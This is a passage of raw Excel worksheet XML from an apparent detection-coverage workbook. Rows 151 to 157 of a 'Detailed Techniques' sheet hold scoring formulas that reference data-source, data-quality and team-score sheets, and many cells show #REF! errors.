        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V151" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W151" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X151" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y151" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="152" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A152" s="8" t="s">
        <v>160</v>
      </c>
      <c r="B152" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C152" s="25" t="s">
        <v>872</v>
      </c>
      <c r="D152" s="10" t="s">
        <v>873</v>
      </c>
      <c r="E152" s="10" t="s">
        <v>874</v>
      </c>
      <c r="F152" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G152" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K152,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H152" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I152" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J152" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K152" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L152" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M152" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N152" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O152" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P152" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q152" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R152" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S152" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T152" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U152" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V152" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W152" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X152" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F152&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F152))-LEN(SUBSTITUTE(TRIM(F152),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y152" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="153" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A153" s="8" t="s">
        <v>85</v>
      </c>
      <c r="B153" s="8" t="s">
        <v>875</v>
      </c>
      <c r="C153" s="25" t="s">
        <v>876</v>
      </c>
      <c r="D153" s="10" t="s">
        <v>877</v>
      </c>
      <c r="E153" s="10" t="s">
        <v>878</v>
      </c>
      <c r="F153" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G153" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K153,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H153" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I153" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J153" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K153" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L153" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M153" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N153" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O153" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P153" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q153" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R153" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S153" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T153" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U153" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V153" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W153" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X153" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F153&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F153))-LEN(SUBSTITUTE(TRIM(F153),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y153" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="154" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A154" s="8" t="s">
        <v>153</v>
      </c>
      <c r="B154" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C154" s="25" t="s">
        <v>879</v>
      </c>
      <c r="D154" s="10" t="s">
        <v>880</v>
      </c>
      <c r="E154" s="10" t="s">
        <v>881</v>
      </c>
      <c r="F154" s="10" t="s">
        <v>882</v>
      </c>
      <c r="G154" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K154,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H154" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I154" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J154" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K154" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L154" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M154" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N154" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O154" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P154" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q154" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R154" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S154" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T154" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U154" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V154" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W154" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X154" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F154&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F154))-LEN(SUBSTITUTE(TRIM(F154),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y154" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="155" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A155" s="8" t="s">
        <v>171</v>
      </c>
      <c r="B155" s="8" t="s">
        <v>883</v>
      </c>
      <c r="C155" s="25" t="s">
        <v>884</v>
      </c>
      <c r="D155" s="18" t="s">
        <v>885</v>
      </c>
      <c r="E155" s="10" t="s">
        <v>886</v>
      </c>
      <c r="F155" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G155" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K155,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H155" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I155" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J155" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K155" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L155" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M155" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N155" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O155" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P155" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q155" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R155" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S155" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T155" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U155" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V155" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W155" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X155" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F155&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F155))-LEN(SUBSTITUTE(TRIM(F155),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y155" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="156" spans="1:25" ht="228" x14ac:dyDescent="0.45">
      <c r="A156" s="8" t="s">
        <v>15</v>
      </c>
      <c r="B156" s="8" t="s">
        <v>401</v>
      </c>
      <c r="C156" s="25" t="s">
        <v>887</v>
      </c>
      <c r="D156" s="10" t="s">
        <v>888</v>
      </c>
      <c r="E156" s="10" t="s">
        <v>889</v>
      </c>
      <c r="F156" s="10" t="s">
        <v>890</v>
      </c>
      <c r="G156" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K156,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H156" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I156" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J156" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K156" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L156" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M156" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N156" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O156" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P156" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q156" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R156" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S156" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T156" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U156" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V156" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W156" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X156" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F156&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F156))-LEN(SUBSTITUTE(TRIM(F156),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y156" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="157" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A157" s="8" t="s">
        <v>11</v>
      </c>
      <c r="B157" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C157" s="25" t="s">
        <v>891</v>
      </c>
      <c r="D157" s="10" t="s">
        <v>892</v>
      </c>
      <c r="E157" s="10" t="s">
        <v>893</v>
      </c>
      <c r="F157" s="10" t="s">
        <v>894</v>
      </c>
      <c r="G157" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K157,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H157" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I157" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J157" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K157" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L157" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M157" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N157" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O157" s="18" t="e">
        <f t="shared" si="18"/>
